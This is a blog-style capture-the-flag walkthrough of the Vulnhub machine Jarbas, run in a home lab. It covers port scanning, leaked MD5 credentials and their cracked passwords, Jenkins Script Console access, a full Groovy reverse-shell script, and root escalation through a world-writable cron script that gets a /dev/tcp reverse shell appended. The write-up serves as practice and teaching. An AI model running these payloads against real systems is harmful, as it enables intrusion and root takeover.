Got bored, decided to edit and publish an old write-up. I’m going to play with a Vulnhub machine called Jarbas.
- Name: Jarbas: 1
- Date release: 3 Apr 2018
- Author: Tiago Tavares
- Series: Jarbas
Jarbas 1.0 – A tribute to a nostalgic Brazilian search engine in the end of 90’s.
Objective: Get root shell!
Right before launching the virtual machine I changed the network adapter to a host-only network. So I ran a scan to find the target.
Going on, starting the enumeration process.
⚡ root@rocinante .../vulnhub/jarbas nmap -p- -sT -sU --min-rate 5000 -oA nmap-jarbas 192.168.195.130 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 22:49 -03 Warning: 192.168.195.130 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.195.130 Host is up (0.0010s latency). Not shown: 65681 closed ports, 65385 open|filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 8080/tcp open http-proxy MAC Address: 00:0C:29:36:F5:29 (VMware) Nmap done: 1 IP address (1 host up) scanned in 147.81 seconds
Now running the common scripts in the found open ports. While this is running I open a new terminal and scan the port 80 with nikto.
⚡ root@rocinante .../vulnhub/jarbas nmap -p T:22,80,3306,8080,U:33848 -sC -sV -oA nmap-sC-jarbas 192.168.195.130 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 22:50 -03 Nmap scan report for 192.168.195.130 Host is up (0.00062s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA) | 256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA) |_ 256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Jarbas - O Seu Mordomo Virtual! 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Jetty 9.4.z-SNAPSHOT | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Site doesn't have a title (text/html;charset=utf-8). MAC Address: 00:0C:29:36:F5:29 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds
⚡ root@rocinante .../vulnhub/jarbas nikto -h http://192.168.195.130 -output nikto-jarbas.txt - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.195.130 + Target Hostname: 192.168.195.130 + Target Port: 80 + Start Time: 2020-07-21 22:54:11 (GMT-3) --------------------------------------------------------------------------- + Server: Apache/2.4.6 (CentOS) PHP/5.4.16 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch. + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 8724 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-07-21 22:55:15 (GMT-3) (64 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Well, the second nmap brought me more info than the nikto scan. Let me take a look at that page and see what is being served.

Feels old man. I check the site a bit and it doesn’t seems to work at all. Likely a decoy or rabbit hole. Before moving on to the port 8080 I decided to check for any other directory that would be accessible here. I spent some time trying different lists and was achieving a big zero when I decided to restart and go for files instead of just directories. Began with a small list and …
⚡ root@rocinante .../vulnhub/jarbas gobuster dir -u http://192.168.195.130 -w /usr/share/dirb/wordlists/common.txt -t 20 -x .html,.php,.txt -o gobuster-commom-jarbas.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.195.130 [+] Threads: 20 [+] Wordlist: /usr/share/dirb/wordlists/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: html,php,txt [+] Timeout: 10s =============================================================== 2020/07/21 22:56:35 Starting gobuster =============================================================== /.hta (Status: 403) /.hta.php (Status: 403) /.hta.txt (Status: 403) /.hta.html (Status: 403) /.htaccess (Status: 403) /.htaccess.html (Status: 403) /.htaccess.php (Status: 403) /.htaccess.txt (Status: 403) /access.html (Status: 200) /.htpasswd (Status: 403) /.htpasswd.html (Status: 403) /.htpasswd.php (Status: 403) /.htpasswd.txt (Status: 403) /cgi-bin/ (Status: 403) /cgi-bin/.html (Status: 403) /index.html (Status: 200) /index.html (Status: 200) =============================================================== 2020/07/21 22:56:38 Finished ===============================================================
What’s that access.html page?
Geoffrey Butler! Serving some nice but super safely encrypted credentials.
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
⚡ root@rocinante ~/.../vulnhub/jarbas hash-identifier ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### -------------------------------------------------- HASH: 5978a63b4654c73c60fa24f836386d87 Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
It’s time to check in one of those many MD5 sites around if those hashes were cracked before. And of course they were.
5978a63b4654c73c60fa24f836386d87:italia99
f463f63616cb3f1e81ce46b39f882fd5:marianna
9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu
Before I move forward, let me see if these credentials are working on that port 22.
⚡ root@rocinante .../vulnhub/jarbas hydra -C credentials-jarbas.txt ssh://192.168.195.130:22 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries, ~1 try per task [DATA] attacking ssh://192.168.195.130:22/ 1 of 1 target completed, 0 valid passwords found
Not that I was wishing for them to work. That seems to be nowhere else to go to in the port 80. I’ll start poking into that port 8080.

The butler’s convention virtual machine. Since I already have some sweet credentials ready, I’ll give them a shot here while I do some more scanning using nikto on port 8080.
Third time’s a charm! Said someone who has failed at something twice. I’m logged but I don’t know what I’m supposed to do. Never dabbled with Jenkins before. The only solution possible: look for jenkins+exploit.
First result was exactly what I needed:
That nikto running on port 8080 turned out to be useless but while it ran I learned about the Jenkins Script Console. I can go through the Metasploit way… or I can try harder™. That article is already pointing out a reverse shell to use with the script console anyway.
I would like to say that as soon as I glanced my eyes over the script I noticed what I have to change (besides the IP and port) but the truth is I had to run it like three times and also a ping to check the TLS values just to figure out this isn’t a Windows box, the nmap showed it is a CentOS so cmd.exe would never work. I switched to /bin/bash/ …
String host="192.168.195.128"; int port=8021; String cmd="/bin/bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
… set a netcat …
⚡ root@rocinante .../vulnhub/jarbas nc -lvp 8021 listening on [any] 8021 ...
… run the jewels script and whoomp, there it is!
192.168.195.130: inverse host lookup failed: Unknown host connect to [192.168.195.128] from (UNKNOWN) [192.168.195.130] 55702
Now for some sort of better shell:
python -c 'import pty; pty.spawn("/bin/sh")'
Low user, not allowed to write in any directory, not much to do, then I checked the crontab.
Heeeey, look at this.
bash-4.2$ ls -lrt /etc/script/CleaningScript.sh ls -lrt /etc/script/CleaningScript.sh -rwxrwxrwx. 1 root root 50 Apr 1 2018 /etc/script/CleaningScript.sh
So this script is run by root, but can be writen by anyone, which means root will do whatever I what every five minutes. That’s nice, let me just check this thing here quickly
bash-4.2$ echo -n "cat /root/flag.txt >/tmp/chillibowl" >>/etc/script/CleaningScript.sh <t/flag.txt >/tmp/chillibowl" >>/etc/script/CleaningScript.sh
bash-4.2$ ls -lrt /etc/script/CleaningScript.sh ls -lrt /etc/script/CleaningScript.sh -rwxrwxrwx. 1 root root 82 Jul 21 23:35 /etc/script/CleaningScript.sh
Simply to make easy things complicated, a script to countdown these endless 5 minutes and check if the file was created.
bash-4.2$ for i in `seq 300 -1 1` ; do echo -ne "r$i " ; sleep 1 ; done ; ls -l /tmp/chillibowl ls -l /tmp/chillibowl -rw-r--r--. 1 root root 156 Jul 21 23:40 /tmp/chillibowl
So I got it, yay! Kinda. I still want to escalate privilege and I think another reverse shell will do just fine.
bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.195.128/8021 0>&1 " >> /etc/script/CleaningScript.sh
All set, I close the jenkis shell, open nc again and patiently wait…
⚡ root@rocinante .../vulnhub/jarbas nc -lvp 8021 listening on [any] 8021 ... 192.168.195.130: inverse host lookup failed: Unknown host connect to [192.168.195.128] from (UNKNOWN) [192.168.195.130] 51260 bash: no job control in this shell [root@jarbas ~]#
You’re such a hacker!